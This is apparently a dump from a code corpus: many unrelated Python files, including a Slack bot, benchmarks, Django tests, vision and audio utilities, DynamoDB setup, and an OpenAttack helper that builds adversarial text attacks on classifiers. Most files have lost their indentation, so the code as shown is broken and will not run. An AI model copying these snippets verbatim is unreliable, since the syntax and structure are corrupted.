'''
    :output: prints the status of the account security
:return: none
'''
checkKeyAge();
checkPassAge();
checkLastLogin();
def deploySomeInstances():
pass
def parse_slack_output(slack_rtm_output):
"""
The Slack Real Time Messaging API is an events firehose.
this parsing function returns None unless a message is
directed at the Bot, based on its ID.
"""
output_list = slack_rtm_output
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# return text after the @ mention, whitespace removed
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
# constants
BOT_ID=''
api_call = slack_client.api_call("users.list")
if api_call.get('ok'):
# retrieve all users so we can find our bot
users = api_call.get('members')
for user in users:
if 'name' in user and user.get('name') == BOT_NAME:
client.chat_post_message('#General', user['name'] + " python is working", username=user['name'])
print("Bot ID for '" + user['name'] + "' is " + user.get('id'))
BOT_ID = user.get('id')
AT_BOT = "<@" + BOT_ID + ">"
EXAMPLE_COMMAND = "do"
else:
print("could not find bot user with the name " + BOT_NAME)
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
|
104414
|
from __future__ import absolute_import, division, print_function
import subprocess
import os
import sys
import pandas
import socket
from time import sleep
from typing import IO, Any, Optional
perf_cmd = [
"perf",
"record",
"--no-buildid",
"--no-buildid-cache",
"-e",
"raw_syscalls:*",
"--switch-output",
"--overwrite",
"-a",
"--tail-synthesize",
]
server_cmd = ["redis-server", "--port"]
def check_port_inuse(port):
# type: (int) -> bool
s = socket.socket()
try:
s.connect(("127.0.0.1", port))
s.close()
return True
except socket.error:
return False
def bench_redis(repeat=3, n=1000000):
# type: (int, int) -> pandas.DataFrame
def read_result(name, file):
# type: (str, Optional[IO[Any]]) -> pandas.DataFrame
df = pandas.read_csv(file, names=["Type", "Req/s"])
df["Name"] = name
return df
bench_cmd = [
"redis-benchmark",
"-r",
"100000",
"-t",
"set,lpush",
"-n",
str(n),
"--csv",
"-p",
]
init_port = 10000
results = []
with open(os.devnull, "w") as fnull:
for i in range(repeat):
print("\nRunning the {}th benchmark\n".format(i + 1))
print("Record performance with perf")
while check_port_inuse(init_port):
init_port += 1
serv = subprocess.Popen(
perf_cmd + server_cmd + [str(init_port)], stdout=fnull
)
sleep(1) # for setup
bench = subprocess.Popen(
bench_cmd + [str(init_port)], stdout=subprocess.PIPE
)
bench.wait()
serv.terminate()
results.append(read_result("perf", bench.stdout))
print("Record performance without perf")
while check_port_inuse(init_port):
init_port += 1
serv = subprocess.Popen(server_cmd + [str(init_port)], stdout=fnull)
sleep(1) # for setup
bench = subprocess.Popen(
bench_cmd + [str(init_port)], stdout=subprocess.PIPE
)
bench.wait()
serv.terminate()
results.append(read_result("no-perf", bench.stdout))
df = pandas.concat(results)
path = os.path.join(os.path.dirname(__file__), "results", "syscall.tsv")
print("wrote %s" % path)
df.to_csv(path, sep="\t")
if __name__ == "__main__":
if os.geteuid() != 0:
print("needs root for perf", file=sys.stderr)
sys.exit(1)
bench_redis(10)
|
104428
|
from rest_framework import serializers
from .models import Task
class TaskSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Task
read_only_fields = ('slug',)
|
104430
|
from django.test import TestCase
from django.urls import reverse
from django.utils import timezone
from core.models import Category, Post
from users.models import UserProfile
from django.contrib.auth.models import User
import pytest
@pytest.mark.django_db
class CategoryTest(TestCase):
def create_category(self, title="test"):
return Category.objects.create(title=title)
def test_category_creation(self):
c = self.create_category()
self.assertTrue(isinstance(c, Category))
self.assertEqual(c.__str__(), c.title)
@pytest.mark.django_db
class PostTest(TestCase):
def setUp(self):
self.category = Category.objects.create(title='testcat', slug='testcat',)
self.user = User.objects.create_user(username="name", email="<EMAIL>", password="<PASSWORD>")
self.userprofile = UserProfile.objects.create(user=self.user, bio="great guy")
def create_post(self, title="product"):
return Post.objects.create(id=12, category=self.category, title=title, author=self.userprofile, created_date=timezone.now())
def test_post_creation(self):
p = self.create_post()
self.assertTrue(isinstance(p, Post))
self.assertEqual(p.__str__(), p.title)
@pytest.mark.django_db
class UserProfileTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(username="name", email="<EMAIL>", password="<PASSWORD>")
def create_userprofile(self):
return UserProfile.objects.create(user=self.user, bio="great guy")
def test_userprofile_create(self):
u = self.create_userprofile()
self.assertTrue(isinstance(u, UserProfile))
|
104529
|
from .vcoco_evaluation import VCOCOEvaluator
from .hico_evaluation import HICOEvaluator
from detectron2.evaluation.evaluator import DatasetEvaluator, DatasetEvaluators, inference_on_dataset
from detectron2.evaluation.testing import print_csv_format, verify_results
__all__ = [k for k in globals().keys() if not k.startswith("_")]
|
104533
|
import socket
from contextlib import closing
from typing import cast
from .logging import LoggingDescriptor
_logger = LoggingDescriptor(name=__name__)
def find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("127.0.0.1", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return cast(int, s.getsockname()[1])
def check_free_port(port: int) -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(("127.0.0.1", port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return cast(int, s.getsockname()[1])
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
_logger.warning(f"Port {port} is not free. Try to find a free port.")
return find_free_port()
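# Hedged usage sketch (not part of the original module; the relative import
# above prevents running this file directly). The preferred port 8270 is an
# arbitrary example:
#
#     port = check_free_port(8270)
#     with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as server:
#         server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#         server.bind(("127.0.0.1", port))
#         server.listen(1)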
|
104563
|
import os
import glob
import random
class PairGenerator(object):
person1 = 'person1'
person2 = 'person2'
label = 'same_person'
def __init__(self, lfw_path='./tf_dataset/resources' + os.path.sep + 'lfw'):
self.all_people = self.generate_all_people_dict(lfw_path)
def generate_all_people_dict(self, lfw_path):
# generates a dictionary between a person and all the photos of that person
all_people = {}
for person_folder in os.listdir(lfw_path):
person_photos = glob.glob(lfw_path + os.path.sep + person_folder + os.path.sep + '*.jpg')
all_people[person_folder] = person_photos
return all_people
def get_next_pair(self):
all_people_names = list(self.all_people.keys())
while True:
# draw a person at random
person1 = random.choice(all_people_names)
# flip a coin to decide whether we fetch a photo of the same person vs different person
same_person = random.random() > 0.5
if same_person:
person2 = person1
else:
# repeatedly pick random names until we find a different name
person2 = person1
while person2 == person1:
person2 = random.choice(all_people_names)
person1_photo = random.choice(self.all_people[person1])
person2_photo = random.choice(self.all_people[person2])
yield ({self.person1: person1_photo,
self.person2: person2_photo,
self.label: same_person})
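# Hedged usage sketch (not part of the original module). It assumes the default
# LFW directory passed to the constructor exists and contains per-person
# folders of .jpg files; get_next_pair() is an endless generator, so only a few
# pairs are drawn here.
if __name__ == '__main__':
    generator = PairGenerator()
    pairs = generator.get_next_pair()
    for _ in range(3):
        pair = next(pairs)
        print(pair[PairGenerator.label], pair[PairGenerator.person1], pair[PairGenerator.person2])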
|
104575
|
import matplotlib.pyplot as plt
import cv2
import numpy as np
def plot_imgs(imgs, titles=None, cmap='brg', ylabel='', normalize=True, ax=None,
r=(0, 1), dpi=100):
n = len(imgs)
if not isinstance(cmap, list):
cmap = [cmap]*n
if ax is None:
_, ax = plt.subplots(1, n, figsize=(6*n, 6), dpi=dpi)
if n == 1:
ax = [ax]
else:
if not isinstance(ax, list):
ax = [ax]
assert len(ax) == len(imgs)
for i in range(n):
if len(imgs[i].shape) == 3:
if imgs[i].shape[-1] == 3:
imgs[i] = imgs[i][..., ::-1] # BGR to RGB
elif imgs[i].shape[-1] == 1:
imgs[i] = imgs[i][..., 0]
if len(imgs[i].shape) == 2 and cmap[i] == 'brg':
cmap[i] = 'gray'
ax[i].imshow(imgs[i], cmap=plt.get_cmap(cmap[i]),
vmin=None if normalize else r[0],
vmax=None if normalize else r[1])
if titles:
ax[i].set_title(titles[i])
ax[i].get_yaxis().set_ticks([])
ax[i].get_xaxis().set_ticks([])
for spine in ax[i].spines.values(): # remove frame
spine.set_visible(False)
ax[0].set_ylabel(ylabel)
plt.tight_layout()
def draw_matches(img1, kp1, img2, kp2, matches, color=None, kp_radius=5,
thickness=2, margin=20):
# Create frame
if len(img1.shape) == 3:
new_shape = (max(img1.shape[0], img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin,
img1.shape[2])
elif len(img1.shape) == 2:
new_shape = (max(img1.shape[0],
img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin)
new_img = np.ones(new_shape, type(img1.flat[0]))*255
# Place original images
new_img[0:img1.shape[0], 0:img1.shape[1]] = img1
new_img[0:img2.shape[0],
img1.shape[1]+margin:img1.shape[1]+img2.shape[1]+margin] = img2
# Draw lines between matches
if color:
c = color
for m in matches:
# Generate random color for RGB/BGR and grayscale images as needed.
        if not color:
            if len(img1.shape) == 3:
                c = np.random.randint(0, 256, 3)
                c = (int(c[0]), int(c[1]), int(c[2]))
            else:
                c = int(np.random.randint(0, 256))
end1 = tuple(np.round(kp1[m.trainIdx].pt).astype(int))
end2 = tuple(np.round(kp2[m.queryIdx].pt).astype(int)
+ np.array([img1.shape[1]+margin, 0]))
cv2.line(new_img, end1, end2, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end1, kp_radius, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end2, kp_radius, c, thickness, lineType=cv2.LINE_AA)
return new_img
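# Hedged usage sketch (not part of the original module): shows plot_imgs on two
# random grayscale images. Sizes are arbitrary and an interactive matplotlib
# backend is assumed; draw_matches additionally needs cv2 keypoints/matches and
# is not exercised here.
if __name__ == '__main__':
    demo_imgs = [np.random.rand(64, 64), np.random.rand(64, 64)]
    plot_imgs(demo_imgs, titles=['left', 'right'], ylabel='demo')
    plt.show()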
|
104601
|
import numpy as np
import utils
from dataset_specifications.dataset import Dataset
class ConstNoiseSet(Dataset):
def __init__(self):
super().__init__()
self.name = "const_noise"
self.std_dev = np.sqrt(0.25)
def get_support(self, x):
return (x-2*self.std_dev, x+2*self.std_dev)
def sample(self, n):
xs = np.random.uniform(low=-1., high=1., size=n)
noise = np.random.normal(loc=0., scale=self.std_dev, size=n)
ys = xs + noise
return np.stack((xs, ys), axis=1)
def get_pdf(self, x):
return utils.get_gaussian_pdf(x, self.std_dev)
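# Hedged usage sketch (not part of the original module). It assumes the local
# `utils` and `dataset_specifications` packages are importable; the sample size
# is an arbitrary example.
if __name__ == "__main__":
    dataset = ConstNoiseSet()
    xy = dataset.sample(5)        # shape (5, 2): column 0 is x, column 1 is y = x + noise
    print(xy)
    print(dataset.get_pdf(0.0))   # noise pdf evaluated at a residual of 0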
|
104624
|
from collections import OrderedDict, defaultdict
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import time
import torch
from FClip.line_parsing import OneStageLineParsing
from FClip.config import M
from FClip.losses import ce_loss, sigmoid_l1_loss, focal_loss, l12loss
from FClip.nms import structure_nms_torch
class FClip(nn.Module):
def __init__(self, backbone):
super(FClip, self).__init__()
self.backbone = backbone
self.M_dic = M.to_dict()
self._get_head_size()
def _get_head_size(self):
head_size = []
for h in self.M_dic['head']['order']:
head_size.append([self.M_dic['head'][h]['head_size']])
self.head_off = np.cumsum([sum(h) for h in head_size])
def lcmap_head(self, output, target):
name = "lcmap"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx-1]
pred = output[s: self.head_off[offidx]].reshape(self.M_dic['head'][name]['head_size'], batch, row, col)
if self.M_dic['head'][name]['loss'] == "Focal_loss":
alpha = self.M_dic['head'][name]['focal_alpha']
loss = focal_loss(pred, target, alpha)
elif self.M_dic['head'][name]['loss'] == "CE":
loss = ce_loss(pred, target, None)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(1, 0, 2, 3).softmax(1)[:, 1], loss * weight
def lcoff_head(self, output, target, mask):
name = 'lcoff'
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(self.M_dic['head'][name]['head_size'], batch, row, col)
loss = sum(
sigmoid_l1_loss(pred[j], target[j], offset=-0.5, mask=mask)
for j in range(2)
)
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(1, 0, 2, 3).sigmoid() - 0.5, loss * weight
def lleng_head(self, output, target, mask):
name = 'lleng'
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(batch, row, col)
if self.M_dic['head'][name]['loss'] == "sigmoid_L1":
loss = sigmoid_l1_loss(pred, target, mask=mask)
pred = pred.sigmoid()
elif self.M_dic['head'][name]['loss'] == "L1":
loss = l12loss(pred, target, mask=mask)
pred = pred.clamp(0., 1.)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred, loss * weight
def angle_head(self, output, target, mask):
name = 'angle'
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(batch, row, col)
if self.M_dic['head'][name]['loss'] == "sigmoid_L1":
loss = sigmoid_l1_loss(pred, target, mask=mask)
pred = pred.sigmoid()
elif self.M_dic['head'][name]['loss'] == "L1":
loss = l12loss(pred, target, mask=mask)
pred = pred.clamp(0., 1.)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred, loss * weight
def jmap_head(self, output, target, n_jtyp):
name = "jmap"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(n_jtyp, self.M_dic['head'][name]['head_size'], batch, row, col)
if self.M_dic['head'][name]['loss'] == "Focal_loss":
alpha = self.M_dic['head'][name]['focal_alpha']
loss = sum(
focal_loss(pred[i], target[i], alpha) for i in range(n_jtyp)
)
elif self.M_dic['head'][name]['loss'] == "CE":
loss = sum(
ce_loss(pred[i], target[i], None) for i in range(n_jtyp)
)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(2, 0, 1, 3, 4).softmax(2)[:, :, 1], loss * weight
def joff_head(self, output, target, n_jtyp, mask):
name = "joff"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(
n_jtyp, self.M_dic['head'][name]['head_size'], batch, row, col)
loss = sum(
sigmoid_l1_loss(pred[i, j], target[i, j], scale=1.0, offset=-0.5, mask=mask[i])
for i in range(n_jtyp)
for j in range(2)
)
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(2, 0, 1, 3, 4).sigmoid() - 0.5, loss * weight
def lmap_head(self, output, target):
name = "lmap"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(batch, row, col)
loss = (
F.binary_cross_entropy_with_logits(pred, target, reduction="none")
.mean(2)
.mean(1)
)
weight = self.M_dic['head'][name]['loss_weight']
return pred.sigmoid(), loss * weight
def forward(self, input_dict, isTest=False):
if isTest:
return self.test_forward(input_dict)
else:
return self.trainval_forward(input_dict)
def test_forward(self, input_dict):
extra_info = {
'time_front': 0.0,
'time_stack0': 0.0,
'time_stack1': 0.0,
'time_backbone': 0.0,
}
extra_info['time_backbone'] = time.time()
image = input_dict["image"]
outputs, feature, backbone_time = self.backbone(image)
extra_info['time_front'] = backbone_time['time_front']
extra_info['time_stack0'] = backbone_time['time_stack0']
extra_info['time_stack1'] = backbone_time['time_stack1']
extra_info['time_backbone'] = time.time() - extra_info['time_backbone']
output = outputs[0]
heatmap = {}
heatmap["lcmap"] = output[:, 0: self.head_off[0]].softmax(1)[:, 1]
heatmap["lcoff"] = output[:, self.head_off[0]: self.head_off[1]].sigmoid() - 0.5
heatmap["lleng"] = output[:, self.head_off[1]: self.head_off[2]].sigmoid()
heatmap["angle"] = output[:, self.head_off[2]: self.head_off[3]].sigmoid()
parsing = True
if parsing:
lines, scores = [], []
for k in range(output.shape[0]):
line, score = OneStageLineParsing.fclip_torch(
lcmap=heatmap["lcmap"][k],
lcoff=heatmap["lcoff"][k],
lleng=heatmap["lleng"][k],
angle=heatmap["angle"][k],
delta=M.delta,
resolution=M.resolution
)
if M.s_nms > 0:
line, score = structure_nms_torch(line, score, M.s_nms)
lines.append(line[None])
scores.append(score[None])
heatmap["lines"] = torch.cat(lines)
heatmap["score"] = torch.cat(scores)
return {'heatmaps': heatmap, 'extra_info': extra_info}
def trainval_forward(self, input_dict):
image = input_dict["image"]
outputs, feature, backbone_time = self.backbone(image)
result = {"feature": feature}
batch, channel, row, col = outputs[0].shape
T = input_dict["target"].copy()
n_jtyp = 1
T["lcoff"] = T["lcoff"].permute(1, 0, 2, 3)
losses = []
accuracy = []
for stack, output in enumerate(outputs):
output = output.transpose(0, 1).reshape([-1, batch, row, col]).contiguous()
L = OrderedDict()
Acc = OrderedDict()
heatmap = {}
lcmap, L["lcmap"] = self.lcmap_head(output, T["lcmap"])
lcoff, L["lcoff"] = self.lcoff_head(output, T["lcoff"], mask=T["lcmap"])
heatmap["lcmap"] = lcmap
heatmap["lcoff"] = lcoff
lleng, L["lleng"] = self.lleng_head(output, T["lleng"], mask=T["lcmap"])
angle, L["angle"] = self.angle_head(output, T["angle"], mask=T["lcmap"])
heatmap["lleng"] = lleng
heatmap["angle"] = angle
losses.append(L)
accuracy.append(Acc)
if stack == 0 and input_dict["do_evaluation"]:
result["heatmaps"] = heatmap
result["losses"] = losses
result["accuracy"] = accuracy
return result
|
104674
|
import json
from lints.vim import VimVint, VimLParserLint
def test_vint_undefined_variable():
msg = ['t.vim:3:6: Undefined variable: s:test (see :help E738)']
res = VimVint().parse_loclist(msg, 1)
assert json.loads(res)[0] == {
"lnum": "3",
"col": "6",
"text": "[vint]Undefined variable: s:test (see :help E738)",
"enum": 1,
"bufnr": 1,
"type": "E"
}
def test_vimlparser_message_without_code():
msg = ['CCTree/plugin/cctree.vim:549:18: vimlparser: unexpected EOL']
res = VimLParserLint().parse_loclist(msg, 1)
assert json.loads(res)[0] == {
"lnum": "549",
"col": "18",
"text": '[vimlparser]unexpected EOL',
"enum": 1,
"bufnr": 1,
"type": "E",
"code": None,
"error": None,
"warning": None,
}
def test_vimlparser_message_with_code():
msg = ['vim-unite-vcs/autoload/vcs/git/revert.vim:29:19: vimlparser: E488: Trailing characters: )'] # noqa
res = VimLParserLint().parse_loclist(msg, 1)
assert json.loads(res)[0] == {
"lnum": "29",
"col": "19",
"text": '[vimlparser]E488: Trailing characters: )',
"enum": 1,
"bufnr": 1,
"type": "E",
"code": "488",
"error": "E",
"warning": None,
}
|
104678
|
import unittest
import numpy as np
import pytest
from audiomentations import TanhDistortion
from audiomentations.core.utils import calculate_rms
class TestTanhDistortion(unittest.TestCase):
def test_single_channel(self):
samples = np.random.normal(0, 0.1, size=(2048,)).astype(np.float32)
sample_rate = 16000
augmenter = TanhDistortion(min_distortion=0.2, max_distortion=0.6, p=1.0)
distorted_samples = augmenter(samples=samples, sample_rate=sample_rate)
self.assertEqual(samples.dtype, distorted_samples.dtype)
self.assertEqual(samples.shape, distorted_samples.shape)
assert np.amax(distorted_samples) < np.amax(samples)
assert calculate_rms(distorted_samples) == pytest.approx(
calculate_rms(samples), abs=1e-3
)
def test_multichannel(self):
num_channels = 3
samples = np.random.normal(0, 0.1, size=(num_channels, 5555)).astype(np.float32)
sample_rate = 16000
augmenter = TanhDistortion(min_distortion=0.05, max_distortion=0.6, p=1.0)
distorted_samples = augmenter(samples=samples, sample_rate=sample_rate)
self.assertEqual(samples.dtype, distorted_samples.dtype)
self.assertEqual(samples.shape, distorted_samples.shape)
for i in range(num_channels):
assert not np.allclose(samples[i], distorted_samples[i])
assert calculate_rms(distorted_samples[i]) == pytest.approx(
calculate_rms(samples[i]), abs=1e-3
)
|
104690
|
from distutils.core import setup
setup(
name='eagle-diff',
version='0.1.0',
description='Show differences between Cadsoft Eagle files',
author='<NAME>',
author_email='<EMAIL>',
long_description=open('README.md').read(),
license=open('LICENSE').read(),
url='https://github.com/fxkr/eagle-diff',
packages=[],
scripts=['eagle-diff'])
|
104706
|
import re, os, glob
def CollectData(N, mem):
for fn in glob.glob("search_tmp.*"):
os.remove(fn)
with open("search.cpp", "rt") as f:
src = f.read()
    ints = mem // 8
src = re.sub(r"const int SIZE = (\d*);", r"const int SIZE = %d;" % N, src)
src = re.sub(r"const int ARR_SAMPLES = (\(.*?\))", r"const int ARR_SAMPLES = %d" % ints, src)
src = re.sub(r"const int KEY_SAMPLES = (\(.*?\))", r"const int KEY_SAMPLES = %d" % ints, src)
with open("search_tmp.cpp", "wt") as f:
f.write(src)
with open("c.bat", "rt") as f:
bat = f.read()
bat = bat.replace("search.cpp", "search_tmp.cpp")
os.system(bat)
logname = "res_%04d_%d.log" % (N, mem)
os.system("search_tmp >res/" + logname)
os.system("search_tmp >res/" + logname)
for fn in glob.glob("res/*"):
os.remove(fn)
sizes = [16, 32, 64, 128, 256, 512, 1024]
#sizes = [128, 256, 512, 1024, 2048, 4096]
for s in sizes:
CollectData(s, 64<<10)
# CollectData(s, 512<<10)
|
104714
|
import pytest
from tests.communication.test_FileComm import TestFileComm as base_class
class TestAsciiFileComm(base_class):
r"""Test for AsciiFileComm communication class."""
@pytest.fixture(scope="class", autouse=True)
def filetype(self):
r"""Communicator type being tested."""
return "ascii"
def test_send_recv_comment(self, send_comm, recv_comm, testing_options):
r"""Test send/recv with commented message."""
msg_send = send_comm.serializer.comment + testing_options['msg']
flag = send_comm.send(msg_send)
assert(flag)
flag, msg_recv = recv_comm.recv()
assert(not flag)
assert(msg_recv == recv_comm.eof_msg)
|
104799
|
import os
import pickle
import random
import traceback
from collections import defaultdict
from telethon import utils as telethon_utils
from telethon.sync import events
from plugins.base import Telegram, PluginMount
from utils import get_url
class Action(Telegram, metaclass=PluginMount):
command_name = "auto_reply_test"
def __call__(self, chat, reply):
import aioredis
@self._client.on(events.NewMessage)
async def _inner(evt):
msg = evt.message
try:
to_chat = await evt.get_chat()
sender = await msg.get_sender()
if not msg.is_reply and to_chat.username == chat or to_chat.id == chat:
self._log_message(msg, to_chat, sender)
await evt.reply(reply)
except Exception as e:
traceback.print_exc()
self._set_file_handler("auto_reply_test")
self._logger.info(f"Auto reply start for chat {chat}, reply: {reply}")
self._client.start()
self._client.run_until_disconnected()
|
104804
|
import os
import toml
import jsbsim
configuration = toml.load('../config/default_configuration.toml')  # included: '/Users/######/Programme/jsbsim-code'  # adjust to your system.
sim = jsbsim.FGFDMExec(os.path.expanduser(configuration["simulation"]["path_jsbsim"]))
sim.load_model('c172p')
print(sim.print_property_catalog())
|
104835
|
import random
from binary_search_tree import BinarySearchTree
def test_bst_size():
bst = BinarySearchTree()
assert len(bst) == 0
for i in range(5):
bst.insert(i)
assert len(bst) == i + 1
def test_bst_insert_at_right_pos():
bst = BinarySearchTree()
bst.insert(15)
assert bst._root._data == 15
bst.insert(12)
assert bst._root._left._data == 12
bst.insert(18)
assert bst._root._right._data == 18
bst.insert(16)
assert bst._root._right._left._data == 16
assert repr(bst) == "12 15 16 18"
bst2 = BinarySearchTree()
data = [x for x in range(10)]
random.shuffle(data)
for i in data:
bst2.insert(i)
assert repr(bst2) == ' '.join(map(str, sorted(data)))
def test_bst_search():
bst = BinarySearchTree([5, 1, 6, 3, 8])
assert bst.search(1) == True
assert bst.search(10) == False
assert bst.search(8) == True
bst.insert(100)
assert bst.search(100) == True
def test_bst_delete():
bst = BinarySearchTree()
bst.insert(1)
assert bst.search(1) == True
bst.delete(1)
assert bst.search(1) == False
bst.insert(21)
bst.insert(28)
bst.insert(14)
bst.insert(32)
bst.insert(25)
bst.insert(18)
bst.insert(11)
bst.insert(30)
bst.insert(19)
bst.insert(27)
assert bst.search(11) == True
bst.delete(11)
assert bst.search(11) == False
assert bst.search(18) == True
bst.delete(18)
assert bst.search(18) == False
bst.delete(28)
assert bst.search(28) == False
assert repr(bst) == "14 19 21 25 27 30 32"
|
104840
|
from __future__ import print_function # Python 2/3 compatibility
import boto3
def create_quotes():
table = client.create_table(
TableName='Quotes.EOD',
KeySchema=[
{
'AttributeName': 'Symbol',
'KeyType': 'HASH' # Partition key
},
{
'AttributeName': 'Date',
'KeyType': 'RANGE' # Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'Symbol',
'AttributeType': 'S'
},
{
'AttributeName': 'Date',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
w = client.get_waiter('table_exists')
w.wait(TableName='Quotes.EOD')
print("table Quotes.EOD created")
print("Table status:", table)
def create_securities():
table = client.create_table(
TableName='Securities',
KeySchema=[
{
'AttributeName': 'Symbol',
'KeyType': 'HASH' # Partition key
},
{
'AttributeName': 'Broker',
'KeyType': 'RANGE' # Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'Symbol',
'AttributeType': 'S'
},
{
'AttributeName': 'Broker',
'AttributeType': 'S'
}
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
w = client.get_waiter('table_exists')
w.wait(TableName='Securities')
print("table Securities created")
print("Table status:", table)
client = boto3.client('dynamodb', region_name='us-east-1')
try:
if 'Quotes.EOD' in client.list_tables()['TableNames']:
client.delete_table(TableName='Quotes.EOD')
waiter = client.get_waiter('table_not_exists')
waiter.wait(TableName='Quotes.EOD')
print("table Quotes.EOD deleted")
if 'Securities' in client.list_tables()['TableNames']:
client.delete_table(TableName='Securities')
waiter = client.get_waiter('table_not_exists')
waiter.wait(TableName='Securities')
print("table Securities deleted")
except Exception as e:
print(e)
create_securities()
create_quotes()
|
104936
|
import json
def extract_json_data(filename):
with open(filename, "r") as file:
data = json.load(file)
return data
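# Hedged usage sketch (not part of the original module); "config.json" is a
# hypothetical file name:
#
#     data = extract_json_data("config.json")
#     print(data)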
|
104998
|
from mgt.datamanagers.data_manager import Dictionary
class DictionaryGenerator(object):
@staticmethod
def create_dictionary() -> Dictionary:
"""
Creates a dictionary for a REMI-like mapping of midi events.
"""
dictionary = [{}, {}]
def append_to_dictionary(word):
if word not in dictionary[0]:
offset = len(dictionary[0])
dictionary[0].update({word: offset})
dictionary[1].update({offset: word})
# First word is reserved for padding
append_to_dictionary("pad")
append_to_dictionary("mask")
append_to_dictionary("start-track")
append_to_dictionary("end-track")
# Instrument indicates the midi instrument program value 0-127
# and value 128 reserved for instruments with is_drum = true
for i in range(129):
append_to_dictionary(f"program_{i}")
# Midi pitch value between 0-127
for i in range(128):
append_to_dictionary(f"note_{i}")
# Duration indicates the duration of a note in 1/32th note intervals (1-128)
for i in range(128):
append_to_dictionary(f"duration_{i + 1}")
# Time shift in 1/32th note intervals (1-128)
for i in range(128):
append_to_dictionary(f"time-shift_{i + 1}")
# Velocity is a value between 0-127, which we divide into 32 bins
for i in range(32):
append_to_dictionary(f"velocity_{i}")
# Tempo is a value between 10-200 divided into bins of 5 (so 1-40)
# for i in range(20):
# append_to_dictionary(f"tempo_{i + 1}")
return Dictionary(dictionary[0], dictionary[1])
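# Hedged usage sketch (not part of the original module): builds the REMI-like
# dictionary. The accessors of the Dictionary wrapper are not shown in this
# file, so only the construction is demonstrated; the word-to-id and id-to-word
# mappings are the two dicts passed to its constructor above.
if __name__ == "__main__":
    remi_dictionary = DictionaryGenerator.create_dictionary()
    print(remi_dictionary)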
|
105030
|
from .device_address_pb2_grpc import *
from .device_address_pb2 import *
from .device_pb2_grpc import *
from .device_pb2 import *
from .lorawan_pb2_grpc import *
from .lorawan_pb2 import *
|
105080
|
from OpenAttack import substitute
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.abspath(__file__)),
".."
))
import OpenAttack
def get_attackers_on_chinese(dataset, clsf):
triggers = OpenAttack.attackers.UATAttacker.get_triggers(clsf, dataset, clsf.tokenizer)
attackers = [
OpenAttack.attackers.FDAttacker(token_unk=clsf.token_unk, lang="chinese"),
OpenAttack.attackers.UATAttacker(triggers=triggers, lang="chinese"),
OpenAttack.attackers.TextBuggerAttacker(lang="chinese"),
OpenAttack.attackers.GeneticAttacker(lang="chinese", filter_words=["的", "了", "着"]),
OpenAttack.attackers.PWWSAttacker(lang="chinese"),
OpenAttack.attackers.PSOAttacker(lang="chinese")
]
return attackers
|
105082
|
from datetime import datetime
from notifications_utils.template import SMSMessageTemplate
from app import statsd_client
from app.celery.service_callback_tasks import send_delivery_status_to_service
from app.config import QueueNames
from app.dao import notifications_dao
from app.dao.notifications_dao import dao_update_notification
from app.dao.service_callback_api_dao import (
get_service_delivery_status_callback_api_for_service,
)
from app.dao.templates_dao import dao_get_template_by_id
from app.models import NOTIFICATION_PENDING
from app.notifications.callbacks import create_delivery_status_callback_data
def _process_for_status(notification_status, client_name, provider_reference):
# record stats
notification = notifications_dao.update_notification_status_by_id(
notification_id=provider_reference,
status=notification_status,
sent_by=client_name.lower(),
)
if not notification:
return
statsd_client.incr("callback.{}.{}".format(client_name.lower(), notification_status))
if notification.sent_at:
